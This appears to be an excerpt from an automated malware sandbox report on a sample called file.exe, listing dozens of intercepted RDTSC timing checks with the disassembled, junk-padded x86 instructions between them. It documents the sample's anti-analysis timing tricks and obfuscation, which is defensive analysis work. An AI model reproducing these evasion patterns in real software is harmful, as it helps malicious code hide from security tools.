                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702C0 second address: 4E70395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b call 00007F6B30D7C39Ah 0x00000010 mov ecx, 09F235D1h 0x00000015 pop esi 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F6B30D7C39Ah 0x0000001d xor ah, 00000028h 0x00000020 jmp 00007F6B30D7C39Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 je 00007F6BA339A6B3h 0x0000002e pushad 0x0000002f jmp 00007F6B30D7C3A5h 0x00000034 push ecx 0x00000035 pushfd 0x00000036 jmp 00007F6B30D7C3A7h 0x0000003b sub si, 12CEh 0x00000040 jmp 00007F6B30D7C3A9h 0x00000045 popfd 0x00000046 pop eax 0x00000047 popad 0x00000048 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004f jmp 00007F6B30D7C3A7h 0x00000054 je 00007F6BA339A655h 0x0000005a pushad 0x0000005b mov di, si 0x0000005e mov ch, 1Ah 0x00000060 popad 0x00000061 mov edx, dword ptr [esi+44h] 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F6B30D7C3A5h 0x0000006d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70395 second address: 4E70399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70399 second address: 4E7039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7039F second address: 4E70434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F6B312295F0h 0x00000011 test edx, 61000000h 0x00000017 jmp 00007F6B312295F0h 0x0000001c jne 00007F6BA3847896h 0x00000022 jmp 00007F6B312295F0h 0x00000027 test byte ptr [esi+48h], 00000001h 0x0000002b jmp 00007F6B312295F0h 0x00000030 jne 00007F6BA3847885h 0x00000036 jmp 00007F6B312295F0h 0x0000003b test bl, 00000007h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F6B312295F7h 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6092A second address: 4E60948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007F6B30D7C3A2h 0x00000010 pop eax 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60948 second address: 4E60986 instructions: 0x00000000 rdtsc 0x00000002 mov bh, BEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bh, ah 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f jmp 00007F6B312295EEh 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 mov ax, A22Dh 0x0000001d mov si, 3429h 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6B312295EEh 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60986 second address: 4E6098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6098A second address: 4E60990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60990 second address: 4E60A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6B30D7C3A1h 0x00000011 or esi, 7B3E2296h 0x00000017 jmp 00007F6B30D7C3A1h 0x0000001c popfd 0x0000001d mov bx, si 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 mov di, si 0x00000026 pushfd 0x00000027 jmp 00007F6B30D7C3A4h 0x0000002c or al, FFFFFFE8h 0x0000002f jmp 00007F6B30D7C39Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, esi 0x00000037 jmp 00007F6B30D7C3A6h 0x0000003c push eax 0x0000003d jmp 00007F6B30D7C39Bh 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6B30D7C3A0h 0x0000004c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60A34 second address: 4E60A3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60A3A second address: 4E60AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F6B30D7C3A0h 0x00000011 sub ebx, ebx 0x00000013 jmp 00007F6B30D7C3A1h 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov al, dl 0x0000001f pushfd 0x00000020 jmp 00007F6B30D7C3A4h 0x00000025 add si, C698h 0x0000002a jmp 00007F6B30D7C39Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60AA0 second address: 4E60AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60AA5 second address: 4E60B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6B30D7C3A5h 0x0000000a add esi, 43D59C36h 0x00000010 jmp 00007F6B30D7C3A1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007F6BA33A1C4Ah 0x0000001f pushad 0x00000020 mov edi, eax 0x00000022 mov dx, si 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F6B30D7C3A1h 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60B01 second address: 4E60B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F6B312295EEh 0x00000010 je 00007F6BA384EE63h 0x00000016 pushad 0x00000017 push eax 0x00000018 mov ecx, edi 0x0000001a pop ebx 0x0000001b popad 0x0000001c test byte ptr [77516968h], 00000002h 0x00000023 jmp 00007F6B312295EBh 0x00000028 jne 00007F6BA384EE58h 0x0000002e pushad 0x0000002f mov esi, 2DCF65EBh 0x00000034 mov ax, 75C7h 0x00000038 popad 0x00000039 mov edx, dword ptr [ebp+0Ch] 0x0000003c jmp 00007F6B312295EAh 0x00000041 xchg eax, ebx 0x00000042 jmp 00007F6B312295F0h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F6B312295EEh 0x0000004f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60B84 second address: 4E60B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60B8A second address: 4E60B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60B8E second address: 4E60BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B30D7C3A4h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70DD1 second address: 4E70DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70B5F second address: 4E70B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6B30D7C3A7h 0x0000000a adc eax, 70C59DBEh 0x00000010 jmp 00007F6B30D7C3A9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70B9C second address: 4E70BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 pushfd 0x00000011 jmp 00007F6B312295F4h 0x00000016 sbb cl, 00000018h 0x00000019 jmp 00007F6B312295EBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70BDD second address: 4E70BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B30D7C3A4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70BF5 second address: 4E70BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0A6F second address: 4EF0A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0A73 second address: 4EF0AE6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6B312295EDh 0x00000008 or cx, 4936h 0x0000000d jmp 00007F6B312295F1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F6B312295F3h 0x00000020 sbb esi, 7B6C666Eh 0x00000026 jmp 00007F6B312295F9h 0x0000002b popfd 0x0000002c jmp 00007F6B312295F0h 0x00000031 popad 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0AE6 second address: 4EF0B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B30D7C3A1h 0x00000008 call 00007F6B30D7C3A0h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6B30D7C39Dh 0x0000001b and cx, AEB6h 0x00000020 jmp 00007F6B30D7C3A1h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0017 second address: 4EF001B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF001B second address: 4EF002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 24F7h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF002D second address: 4EF0031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0031 second address: 4EF0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0037 second address: 4EF003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF003D second address: 4EF0041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0041 second address: 4EF00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F6B312295F5h 0x00000010 sub si, D506h 0x00000015 jmp 00007F6B312295F1h 0x0000001a popfd 0x0000001b pushad 0x0000001c call 00007F6B312295EEh 0x00000021 pop ecx 0x00000022 jmp 00007F6B312295EBh 0x00000027 popad 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6B312295F0h 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF00AA second address: 4EF00B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DD3 second address: 4EE0DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DD9 second address: 4EE0DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DDD second address: 4EE0DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DEC second address: 4EE0E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov ecx, 7F9B8EF3h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F6B30D7C3A5h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6B30D7C39Dh 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0E2E second address: 4EE0E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E800CA second address: 4E800D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E800D0 second address: 4E800D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E800D4 second address: 4E8011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6B30D7C3A6h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F6B30D7C3A0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F6B30D7C3A0h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8011D second address: 4E80121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80121 second address: 4E8013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF024A second address: 4EF024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF024E second address: 4EF0252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0252 second address: 4EF0258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEA03 second address: AAEA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90536 second address: 4E9057B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 54h 0x00000005 jmp 00007F6B312295F8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push FFFFFFFEh 0x0000000f jmp 00007F6B312295F0h 0x00000014 push 5BE20043h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6B312295ECh 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9057B second address: 4E90627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2CADC05Bh 0x00000010 jmp 00007F6B30D7C3A6h 0x00000015 call 00007F6B30D7C399h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F6B30D7C39Eh 0x00000021 xor eax, 4EE435B8h 0x00000027 jmp 00007F6B30D7C39Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F6B30D7C3A8h 0x00000033 add al, 00000018h 0x00000036 jmp 00007F6B30D7C39Bh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F6B30D7C3A9h 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F6B30D7C39Ch 0x0000004e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90627 second address: 4E90672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F6B312295F8h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jmp 00007F6B312295EBh 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f call 00007F6B312295F2h 0x00000024 pop esi 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90672 second address: 4E906EF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6B30D7C39Bh 0x00000008 sub ax, F4FEh 0x0000000d jmp 00007F6B30D7C3A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dl, cl 0x00000017 popad 0x00000018 mov eax, dword ptr fs:[00000000h] 0x0000001e pushad 0x0000001f mov si, bx 0x00000022 pushfd 0x00000023 jmp 00007F6B30D7C3A5h 0x00000028 jmp 00007F6B30D7C39Bh 0x0000002d popfd 0x0000002e popad 0x0000002f nop 0x00000030 jmp 00007F6B30D7C3A6h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906EF second address: 4E906F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906F3 second address: 4E906F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906F9 second address: 4E9073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6B312295F6h 0x0000000f sub esp, 1Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6B312295F7h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9073F second address: 4E907D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6B30D7C39Ch 0x00000011 add ax, 07D8h 0x00000016 jmp 00007F6B30D7C39Bh 0x0000001b popfd 0x0000001c mov ax, 1E8Fh 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F6B30D7C3A5h 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F6B30D7C39Eh 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F6B30D7C39Dh 0x00000037 sbb ecx, 2AB9F0D6h 0x0000003d jmp 00007F6B30D7C3A1h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E907D1 second address: 4E9085F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F6B312295F8h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6B312295F0h 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 movzx esi, di 0x00000019 mov edi, 71FF4F6Eh 0x0000001e popad 0x0000001f push ebp 0x00000020 pushad 0x00000021 call 00007F6B312295F0h 0x00000026 pushad 0x00000027 popad 0x00000028 pop esi 0x00000029 pushfd 0x0000002a jmp 00007F6B312295F1h 0x0000002f sub cx, F7A6h 0x00000034 jmp 00007F6B312295F1h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esp], edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F6B312295EDh 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9085F second address: 4E908A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F6B30D7C3A3h 0x0000000b or ch, FFFFFF8Eh 0x0000000e jmp 00007F6B30D7C3A9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [7751B370h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ch, 32h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E908A2 second address: 4E908C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B312295F8h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E908C8 second address: 4E908CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E908CE second address: 4E90917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F6B312295EBh 0x00000012 add ecx, 0396EFAEh 0x00000018 jmp 00007F6B312295F9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f movsx edi, ax 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 mov edx, ecx 0x00000027 mov ch, 3Eh 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90917 second address: 4E90970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov ecx, 4D1C853Bh 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F6B30D7C39Eh 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 pushad 0x00000015 push ecx 0x00000016 mov cx, bx 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F6B30D7C3A6h 0x00000020 xor ax, F5E8h 0x00000025 jmp 00007F6B30D7C39Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr fs:[00000000h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90970 second address: 4E90975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90975 second address: 4E9097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9097B second address: 4E9097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9097F second address: 4E909C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F6B30D7C3A0h 0x00000013 mov eax, dword ptr [esi+10h] 0x00000016 jmp 00007F6B30D7C3A0h 0x0000001b test eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E909C8 second address: 4E909D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 4FEEh 0x00000008 popad 0x00000009 rdtsc
